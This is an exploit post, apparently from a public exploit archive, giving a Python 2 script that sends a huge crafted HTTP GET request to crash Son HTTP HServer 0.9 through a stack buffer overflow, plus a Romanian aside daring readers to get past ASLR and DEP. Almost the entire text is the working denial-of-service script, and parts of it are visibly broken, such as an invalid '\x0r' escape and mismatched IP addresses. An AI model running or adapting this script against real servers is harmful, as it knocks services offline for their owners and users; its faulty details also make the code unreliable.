# Exploit Title: Son HTTP HServer stack buffer overflow # Date: 2015 June # Author: sleed - [URL="http://www.rstforums.com"]Romanian Security Team - Homepage[/URL] & Pwnthecode.org # Version: 0.9 # Tested on: Windows 8 # # Description: A simple bof denial of service in Son HTTP HServer # # import socket import struct payload = "\x42\x41\x43" * 80392 payload += "\x81\xc4\xf0\xea\xff\xff" + "B" * 70330 payload += "\x0r" + "C" * 110030 print "[+] sending payload: ", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.100", 80)) buf = ( "GET /" + payload + " HTTP/1.1\r\n" + "Host: 192.168.0.101" + "\r\n\r\n" ) s.send(buf) s.close() //Cine are chef sa-si bata capul, sa TREACA DE ASLR si DEP e my guest